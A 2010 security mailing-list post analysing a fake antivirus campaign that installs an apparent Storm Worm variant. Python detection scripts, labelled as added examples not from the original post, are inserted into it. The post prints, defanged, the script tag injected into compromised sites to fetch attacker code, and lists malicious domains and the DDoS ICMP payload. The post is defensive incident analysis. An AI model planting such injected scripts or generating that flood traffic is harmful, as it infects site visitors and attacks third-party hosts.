[nsp-sec] Breaking News(?) - Storm Worm masquerading as Fake Antivirus? Many DDoS Targets (and Heads up Google)

Brian Eckman eckman at umn.edu
Tue May 4 15:16:07 EDT 2010


NSP-SEC

<disclaimer> Below is incomplete analysis being released now due to it
not being widely reported at the time analysis was started - minor
parts of it might be inaccurate; important parts of it have been
verified </disclaimer>

Numerous compromised Web sites are redirecting browsers to Rogue
Security software, which, if run by the user, installs Storm, or
something incredibly similar. (I am convinced it is "new Storm".)

The site that I visited had the following at the end of the HTML for
its index page: (defanged to prevent accidental access)

<script src="http://kdjkfjskdfjlskdjf(dot)com/kp.php"></script>

This redirects the browser to a Fake AV site within the xorg.pl domain
- which has been known for a while now to be up to no good.

My infected lab computer did the following every 7 seconds upon
running the FakeAV installer:

User-Agent: Ms276e
HEAD /
Host: 74.125.45.100

Ms276e was the name of the running process. Port 27777/tcp was opened
by the process, and was given an exception in Windows Firewall (w/o
prompting). I have no idea if these are static, or randomly chosen, so
using these indicators as IDS might not work well.
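Because the process name, User-Agent and port may not be static, a detector that keys on the behaviour (a bare "HEAD /" to one host at a fixed interval from a non-browser User-Agent) is more robust than matching the literal "Ms276e". The following is an added example, not code from the original post; the proxy log format and the sample lines are constructed for the example.

```python
"""Periodic HEAD / beacon detector over web-proxy log lines.

Added example (not from the original post). The log format below is a
hypothetical one chosen for the example:
    <ISO timestamp> <client_ip> <method> <host> <path> "<user-agent>"
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<host>\S+) '
    r'(?P<path>\S+) "(?P<ua>[^"]*)"$'
)

# Constructed sample: 10.20.68.25 beacons every 7 s (the behaviour described in
# the post); 10.20.68.30 is ordinary browsing and must not be flagged.
SAMPLE_LOG = """\
2010-05-04T12:36:00 10.20.68.25 HEAD 74.125.45.100 / "Ms276e"
2010-05-04T12:36:07 10.20.68.25 HEAD 74.125.45.100 / "Ms276e"
2010-05-04T12:36:14 10.20.68.25 HEAD 74.125.45.100 / "Ms276e"
2010-05-04T12:36:21 10.20.68.25 HEAD 74.125.45.100 / "Ms276e"
2010-05-04T12:36:28 10.20.68.25 HEAD 74.125.45.100 / "Ms276e"
2010-05-04T12:36:03 10.20.68.30 GET www.example.com /index.html "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
2010-05-04T12:36:09 10.20.68.30 GET www.example.com /style.css "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
2010-05-04T12:36:40 10.20.68.30 GET www.example.com /news "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
2010-05-04T12:36:41 10.20.68.30 GET www.example.com /news/1 "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
2010-05-04T12:37:30 10.20.68.30 GET www.example.com /news/2 "Mozilla/5.0 (Windows NT 6.1) Firefox/3.6"
"""

# Anything a real browser or common tool would send; everything else is "odd".
BROWSER_UA = re.compile(r"Mozilla|Opera|curl|Wget", re.I)


def parse_log(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.fromisoformat(rec["ts"])
            yield rec


def find_beacons(text, min_hits=4, max_jitter=1.0):
    """Return {(src, host): period_seconds} for flows that look like beacons.

    A flow qualifies when it has at least `min_hits` requests that are
    "HEAD /" with a non-browser User-Agent, and the gaps between them are
    nearly constant (population std-dev of the gaps <= max_jitter seconds).
    """
    flows = defaultdict(list)
    for rec in parse_log(text):
        if (rec["method"] == "HEAD" and rec["path"] == "/"
                and not BROWSER_UA.search(rec["ua"])):
            flows[(rec["src"], rec["host"])].append(rec["ts"])

    beacons = {}
    for key, stamps in flows.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if pstdev(gaps) <= max_jitter:
            beacons[key] = round(mean(gaps), 1)
    return beacons


if __name__ == "__main__":
    for (src, host), period in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {host}: HEAD / every ~{period}s")
```

Tune `min_hits` and `max_jitter` to the log volume; at one request every 7 seconds an infected host produces hundreds of hits per hour, so a low `min_hits` is enough, and the jitter bound is what keeps ordinary bursty browsing out of the result.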

I have reason to believe that MANY Web sites have been compromised to
include the Javascript that leads to this. I don't know yet what they
have in common - they *might* be all blog sites though.


Below are DNS log snippets from the event. Time is CDT (GMT-0500);
www.yogadork(dot)com is one of the infected Web sites.

<snip>
(infected blog site omitted, all potentially hazardous host names
below defanged)

<snip>
(possibly harmful sites defanged)
May  4 12:31:59 client 10.20.68.25#61450: query: www.yogadork(dot)com IN A +
May  4 12:32:23 client 10.20.68.25#58257: query: kdjkfjskdfjlskdjf(dot)com IN A +
May  4 12:32:23 client 10.20.68.25#57666: query: www4.suitcase52td(dot)net IN A +
May  4 12:32:24 client 10.20.68.25#64873: query: www1.safetypcwork5(dot)net IN A +
May  4 12:32:32 client 10.20.68.25#62094: query: www.symantec.com IN A +
May  4 12:33:39 client 10.20.68.25#57678: query: www2.smartsoft27-pd.xorg(dot)pl IN A +
May  4 12:33:58 client 10.20.68.25#64874: query: www2.smartsoft11-pd.xorg(dot)pl IN A +
May  4 12:35:28 client 10.20.68.25#50931: query: update1.safelinkhere(dot)net IN A +
May  4 12:36:06 client 10.20.68.25#54218: query: update2.safelinkhere(dot)net IN A +
May  4 12:36:06 client 10.20.68.25#61366: query: secure1.cleanpayzone(dot)com IN A +
May  4 12:36:07 client 10.20.68.25#58256: query: secure2.cleanpayzone(dot)net IN A +
May  4 12:36:07 client 10.20.68.25#64875: query: www5.my-security-engine(dot)net IN A +
May  4 12:36:07 client 10.20.68.25#64876: query: report.goodguardz(dot)com IN A +
May  4 12:36:10 client 10.20.68.25#57970: query: update1.safelinkhere(dot)net IN A +
May  4 12:36:11 client 10.20.68.25#62136: query: report.land-protection(dot)net IN A +
May  4 12:36:28 client 10.20.68.25#51751: query: myfairland(dot)com IN A +
May  4 12:36:38 client 10.20.68.25#60858: query: secure1.securexzone(dot)com IN A +
May  4 12:36:38 client 10.20.68.25#65320: query: secure2.securexzone(dot)net IN A +
May  4 12:36:39 client 10.20.68.25#59800: query: update2.securepro.xorg(dot)pl IN A +
May  4 12:36:40 client 10.20.68.25#49395: query: update1.securepro.xorg(dot)pl IN A +
May  4 12:36:42 client 10.20.68.25#62714: query: report1.stat-mx.xorg(dot)pl IN A +
May  4 12:39:31 client 10.20.68.25#54889: query: secure1.securexzone(dot)com IN A +
May  4 12:40:42 client 10.20.68.25#62874: query: secure2.securexzone(dot)net IN A +
May  4 12:41:15 client 10.20.68.25#60349: query: report.land-protection(dot)net IN A +
May  4 12:51:16 client 10.20.68.25#54828: query: update1.safelinkhere(dot)net IN A +
May  4 12:51:25 client 10.20.68.25#54386: query: avcheck(dot)biz IN A +
May  4 12:51:28 client 10.20.68.25#56204: query: virtest(dot)com IN A +
May  4 12:51:45 client 10.20.68.25#57005: query: antivirus-armature(dot)com IN A +
May  4 12:51:47 client 10.20.68.25#57005: query: antivirus-armature(dot)com IN A +
May  4 12:51:49 client 10.20.68.25#57005: query: antivirus-armature(dot)com IN A +
May  4 12:51:49 client 10.20.68.25#57005: query: antivirus-armature(dot)com IN A +
May  4 12:51:53 client 10.20.68.25#57005: query: antivirus-armature(dot)com IN A +
May  4 12:51:53 client 10.20.68.25#57005: query: antivirus-armature(dot)com IN A +
<snip>

The infected host was running up-to-date SAVCE, nothing was
detected. I don't know yet if the symantec.com query noted above was
due to the infection or not; I suspect it was not related.
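The useful question to ask of a query log like the one above is "what did this client resolve in the minutes after it hit the compromised site?", since that chain (redirector, FakeAV landing pages, then the "update"/"report"/"secure" hosts once the installer runs) is what turns a single blog visit into a list of hosts to block and other clients to look for. The script below is an added example, not code from the original post; it parses BIND-style query log lines (rejoining lines that a mail client wrapped after "query:", as happened above), and reports every name a client looked up within a window after a seed lookup. The sample is a constructed subset of the post's own log, kept defanged; a real BIND log carries plain dots and the regex accepts both.

```python
"""BIND query-log triage: names resolved by a client after a seed lookup.

Added example (not from the original post). Input is the syslog-prefixed
BIND query log format seen in the post:
    Mon  D HH:MM:SS client <ip>#<port>: query: <qname> IN <qtype> +
"""
import re
from datetime import datetime, timedelta

# Constructed sample: a subset of the post's log, with the same wrapped lines.
SAMPLE = """\
May  4 12:31:59 client 10.20.68.25#61450: query: www.yogadork(dot)com IN A +
May  4 12:32:23 client 10.20.68.25#58257: query:
kdjkfjskdfjlskdjf(dot)com IN A +
May  4 12:32:23 client 10.20.68.25#57666: query:
www4.suitcase52td(dot)net IN A +
May  4 12:32:32 client 10.20.68.25#62094: query: www.symantec.com IN A +
May  4 12:33:39 client 10.20.68.25#57678: query:
www2.smartsoft27-pd.xorg(dot)pl IN A +
May  4 12:35:00 client 10.20.68.40#50000: query: www.example.org IN A +
"""

LINE_RE = re.compile(
    r"^(?P<mon>[A-Za-z]{3})\s+(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) client "
    r"(?P<ip>[\d.]+)#(?P<port>\d+): query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def rejoin(text):
    """Glue a line that ends in 'query:' to the following line.

    Mail clients wrap long log lines; BIND itself never splits a query line.
    """
    out, pending = [], None
    for line in text.splitlines():
        if pending is not None:
            out.append(pending + " " + line.strip())
            pending = None
        elif line.rstrip().endswith("query:"):
            pending = line.rstrip()
        else:
            out.append(line)
    return out


def parse(text, year=2010):
    """Return a list of {ts, ip, qname, qtype} records, in log order.

    Syslog timestamps carry no year, so the caller supplies it (2010 here,
    the date of the post).
    """
    recs = []
    for line in rejoin(text):
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(
            f"{year} {m['mon']} {int(m['day'])} {m['time']}", "%Y %b %d %H:%M:%S"
        )
        recs.append({"ts": ts, "ip": m["ip"],
                     "qname": m["qname"].lower(), "qtype": m["qtype"]})
    return recs


def names_after(recs, seed_name, window_s=600):
    """For each client that resolved seed_name, the distinct other names it
    queried in the following window_s seconds, in first-seen order.

    Only the client's first lookup of the seed is used as the anchor.
    """
    result = {}
    for r in recs:
        if r["qname"] != seed_name.lower() or r["ip"] in result:
            continue
        t0, t1 = r["ts"], r["ts"] + timedelta(seconds=window_s)
        seen = []
        for s in recs:
            if (s["ip"] == r["ip"] and t0 < s["ts"] <= t1
                    and s["qname"] != r["qname"] and s["qname"] not in seen):
                seen.append(s["qname"])
        result[r["ip"]] = seen
    return result


if __name__ == "__main__":
    for ip, names in names_after(parse(SAMPLE), "www.yogadork(dot)com").items():
        print(ip)
        for n in names:
            print("   ", n)
```

Run the same function with a known-bad name from the chain (for example one of the xorg(dot)pl hosts) as the seed to find other clients that reached the FakeAV stage even if they came from a different compromised site.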

The ICMP packets used in the DDoS are 1028-byte ICMP Echo Requests: a
1008-byte ICMP message, i.e. 1000 bytes of payload after the 8-byte ICMP
header. The payload is the same in every packet - ASCII "a" through "w"
(0x61 through 0x77) repeated 43 times, followed by "a" through "k"
(23 * 43 + 11 = 1000 bytes).

12:11:23.888421 IP (IP removed) > 62.122.75.103: ICMP echo request, id 1, seq 17661, length 1008
       0x0000:  <removed>
       0x0010:  <removed>
       0x0020:  6162 6364 6566 6768 696a 6b6c 6d6e 6f70  abcdefghijklmnop
       0x0030:  7172 7374 7576 7761 6263 6465 6667 6869  qrstuvwabcdefghi
       0x0040:  6a6b 6c6d 6e6f 7071 7273 7475 7677 6162  jklmnopqrstuvwab
       0x0050:  6364 6566 6768 696a 6b6c 6d6e 6f70 7172  cdefghijklmnopqr
       0x0060:  7374 7576 7761 6263 6465 6667 6869 6a6b  stuvwabcdefghijk
       0x0070:  6c6d 6e6f 7071 7273 7475 7677 6162 6364  lmnopqrstuvwabcd
       0x0080:  6566 6768 696a 6b6c 6d6e 6f70 7172 7374  efghijklmnopqrst
       0x0090:  7576 7761 6263 6465 6667 6869 6a6b 6c6d  uvwabcdefghijklm
       0x00a0:  6e6f 7071 7273 7475 7677 6162 6364 6566  nopqrstuvwabcdef
       0x00b0:  6768 696a 6b6c 6d6e 6f70 7172 7374 7576  ghijklmnopqrstuv
       0x00c0:  7761 6263 6465 6667 6869 6a6b 6c6d 6e6f  wabcdefghijklmno
       0x00d0:  7071 7273 7475 7677 6162 6364 6566 6768  pqrstuvwabcdefgh
       0x00e0:  696a 6b6c 6d6e 6f70 7172 7374 7576 7761  ijklmnopqrstuvwa
       0x00f0:  6263 6465 6667 6869 6a6b 6c6d 6e6f 7071  bcdefghijklmnopq
       0x0100:  7273 7475 7677 6162 6364 6566 6768 696a  rstuvwabcdefghij
       0x0110:  6b6c 6d6e 6f70 7172 7374 7576 7761 6263  klmnopqrstuvwabc
       0x0120:  6465 6667 6869 6a6b 6c6d 6e6f 7071 7273  defghijklmnopqrs
       0x0130:  7475 7677 6162 6364 6566 6768 696a 6b6c  tuvwabcdefghijkl
       0x0140:  6d6e 6f70 7172 7374 7576 7761 6263 6465  mnopqrstuvwabcde
       0x0150:  6667 6869 6a6b 6c6d 6e6f 7071 7273 7475  fghijklmnopqrstu
       0x0160:  7677 6162 6364 6566 6768 696a 6b6c 6d6e  vwabcdefghijklmn
       0x0170:  6f70 7172 7374 7576 7761 6263 6465 6667  opqrstuvwabcdefg
       0x0180:  6869 6a6b 6c6d 6e6f 7071 7273 7475 7677  hijklmnopqrstuvw
       0x0190:  6162 6364 6566 6768 696a 6b6c 6d6e 6f70  abcdefghijklmnop
       0x01a0:  7172 7374 7576 7761 6263 6465 6667 6869  qrstuvwabcdefghi
       0x01b0:  6a6b 6c6d 6e6f 7071 7273 7475 7677 6162  jklmnopqrstuvwab
       0x01c0:  6364 6566 6768 696a 6b6c 6d6e 6f70 7172  cdefghijklmnopqr
       0x01d0:  7374 7576 7761 6263 6465 6667 6869 6a6b  stuvwabcdefghijk
       0x01e0:  6c6d 6e6f 7071 7273 7475 7677 6162 6364  lmnopqrstuvwabcd
       0x01f0:  6566 6768 696a 6b6c 6d6e 6f70 7172 7374  efghijklmnopqrst
       0x0200:  7576 7761 6263 6465 6667 6869 6a6b 6c6d  uvwabcdefghijklm
       0x0210:  6e6f 7071 7273 7475 7677 6162 6364 6566  nopqrstuvwabcdef
       0x0220:  6768 696a 6b6c 6d6e 6f70 7172 7374 7576  ghijklmnopqrstuv
       0x0230:  7761 6263 6465 6667 6869 6a6b 6c6d 6e6f  wabcdefghijklmno
       0x0240:  7071 7273 7475 7677 6162 6364 6566 6768  pqrstuvwabcdefgh
       0x0250:  696a 6b6c 6d6e 6f70 7172 7374 7576 7761  ijklmnopqrstuvwa
       0x0260:  6263 6465 6667 6869 6a6b 6c6d 6e6f 7071  bcdefghijklmnopq
       0x0270:  7273 7475 7677 6162 6364 6566 6768 696a  rstuvwabcdefghij
       0x0280:  6b6c 6d6e 6f70 7172 7374 7576 7761 6263  klmnopqrstuvwabc
       0x0290:  6465 6667 6869 6a6b 6c6d 6e6f 7071 7273  defghijklmnopqrs
       0x02a0:  7475 7677 6162 6364 6566 6768 696a 6b6c  tuvwabcdefghijkl
       0x02b0:  6d6e 6f70 7172 7374 7576 7761 6263 6465  mnopqrstuvwabcde
       0x02c0:  6667 6869 6a6b 6c6d 6e6f 7071 7273 7475  fghijklmnopqrstu
       0x02d0:  7677 6162 6364 6566 6768 696a 6b6c 6d6e  vwabcdefghijklmn
       0x02e0:  6f70 7172 7374 7576 7761 6263 6465 6667  opqrstuvwabcdefg
       0x02f0:  6869 6a6b 6c6d 6e6f 7071 7273 7475 7677  hijklmnopqrstuvw
       0x0300:  6162 6364 6566 6768 696a 6b6c 6d6e 6f70  abcdefghijklmnop
       0x0310:  7172 7374 7576 7761 6263 6465 6667 6869  qrstuvwabcdefghi
       0x0320:  6a6b 6c6d 6e6f 7071 7273 7475 7677 6162  jklmnopqrstuvwab
       0x0330:  6364 6566 6768 696a 6b6c 6d6e 6f70 7172  cdefghijklmnopqr
       0x0340:  7374 7576 7761 6263 6465 6667 6869 6a6b  stuvwabcdefghijk
       0x0350:  6c6d 6e6f 7071 7273 7475 7677 6162 6364  lmnopqrstuvwabcd
       0x0360:  6566 6768 696a 6b6c 6d6e 6f70 7172 7374  efghijklmnopqrst
       0x0370:  7576 7761 6263 6465 6667 6869 6a6b 6c6d  uvwabcdefghijklm
       0x0380:  6e6f 7071 7273 7475 7677 6162 6364 6566  nopqrstuvwabcdef
       0x0390:  6768 696a 6b6c 6d6e 6f70 7172 7374 7576  ghijklmnopqrstuv
       0x03a0:  7761 6263 6465 6667 6869 6a6b 6c6d 6e6f  wabcdefghijklmno
       0x03b0:  7071 7273 7475 7677 6162 6364 6566 6768  pqrstuvwabcdefgh
       0x03c0:  696a 6b6c 6d6e 6f70 7172 7374 7576 7761  ijklmnopqrstuvwa
       0x03d0:  6263 6465 6667 6869 6a6b 6c6d 6e6f 7071  bcdefghijklmnopq
       0x03e0:  7273 7475 7677 6162 6364 6566 6768 696a  rstuvwabcdefghij
       0x03f0:  6b6c 6d6e 6f70 7172 7374 7576 7761 6263  klmnopqrstuvwabc
       0x0400:  6465 6667 6869 6a6b                      defghijk
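The dump above is enough to write an exact match for the DDoS packets. The code below is an added example, not from the original post: it builds the cycling "a".."w" payload, parses a raw IPv4+ICMP datagram, and reports whether it is an Echo Request of exactly the shape described (1028-byte datagram, 1008-byte ICMP message, 1000 bytes of the pattern). The packet used to exercise it is constructed in memory with a documentation-range source address; nothing is sent on the wire.

```python
"""Match captured packets against the DDoS ICMP Echo Request described above.

Added example (not from the original post). Works on raw IPv4 bytes as a
pcap reader or a raw socket would hand them over.
"""
import struct


def cycling_payload(n):
    """First n bytes of 'abcdefghijklmnopqrstuvw' repeated end to end."""
    alphabet = bytes(range(0x61, 0x78))  # 'a'..'w', 23 bytes
    reps, rem = divmod(n, len(alphabet))
    return alphabet * reps + alphabet[:rem]


def inet_checksum(data):
    """RFC 1071 ones-complement checksum (IP and ICMP headers)."""
    if len(data) % 2:
        data += b"\x00"
    s = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while s >> 16:
        s = (s & 0xFFFF) + (s >> 16)
    return (~s) & 0xFFFF


def build_echo_request(src, dst, payload, ident=1, seq=17661):
    """Constructed IPv4 datagram carrying an ICMP Echo Request (no options)."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    total = 20 + len(icmp)
    src_b = bytes(map(int, src.split(".")))
    dst_b = bytes(map(int, dst.split(".")))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0, 128, 1, 0, src_b, dst_b)
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp


def parse_icmp_echo(pkt):
    """Return (payload, ip_total_length) for an IPv4 ICMP Echo Request, else None."""
    if len(pkt) < 28 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    total = struct.unpack("!H", pkt[2:4])[0]
    proto = pkt[9]
    if proto != 1 or len(pkt) < ihl + 8:
        return None
    icmp_type = pkt[ihl]
    if icmp_type != 8:
        return None
    return pkt[ihl + 8:total], total


def is_storm_ddos_ping(pkt, payload_len=1000):
    """True when pkt is an Echo Request with exactly the described payload:
    20-byte IP header + 8-byte ICMP header + payload_len bytes of 'a'..'w'."""
    parsed = parse_icmp_echo(pkt)
    if parsed is None:
        return False
    payload, total = parsed
    return total == 20 + 8 + payload_len and payload == cycling_payload(payload_len)


if __name__ == "__main__":
    # 192.0.2.1 is a documentation address standing in for the removed source.
    sample = build_echo_request("192.0.2.1", "62.122.75.103", cycling_payload(1000))
    print(len(sample), "bytes,", "match" if is_storm_ddos_ping(sample) else "no match")
```

One caveat before turning this into an IDS rule: the Windows ping utility fills its echo payload with exactly this cycling "a".."w" pattern, so `ping -l 1000` from a clean Windows host produces a byte-identical payload. The payload pins down the tool, not the intent; the rate (many packets per second) and the fan-out to dozens of destinations are what distinguish the DDoS traffic from a stray large ping.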


Note that I have NOT observed drive-by exploits leading to infection,
although it wouldn't surprise me if that happens at some point in
time. As it stands now, it appears that users need to be tricked into
running the FakeAV installer that is presented to them in order to
become infected.

The first time I saw this particular FakeAV leading to DDoS, etc. was
the afternoon of May 1st. I haven't gone back before that yet to see
if there was an earlier hit that we assumed was plain old Fake AV...

--------------------------------------------------------------
Below this is an excerpt from an email I sent out to local folks here.
You can take what you want from it (i.e., reword as you see fit, or
leave as-is, I don't care) and share outside of NSP-SEC, with optional
attribution to me, but *not* attributed to NSP-SEC.
--------------------------------------------------------------

We have seen a few hosts infected with what I believe to be a/the new
variant of "Storm Worm". What is unique is that the initial infection
is coming from compromised Web sites that redirect the browser to a
Fake AV site promoting "My Security Engine". When the user runs the
"My Security Engine" installer, it connects to a host on the Internet
to download the full package.

The M.O. so far is identical to what we've seen for Fake Antivirus for
years now, until....

The downloaded "full package" is between 2 and 3 MB - noticeably larger
than the FakeAV packages we typically see. The package does the usual
tricks to convince you to buy their software, it disables the ability
to run Task Manager, etc. However, it also opens up a TCP port, and
silently gives itself an exception in Windows Firewall. Then, within
minutes, it will likely be either spamming, and/or participating in a
*massive* distributed denial of service attack against literally
dozens of Internet hosts. (Clearly this is not a "documented feature"
of their Antivirus product.)

Feel free to pass this along to inform folks about the risks of rogue
Antivirus software - they might be getting a lot more than they
bargained for. I'll try to get more details released this afternoon.

Cheers,
Brian
--
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
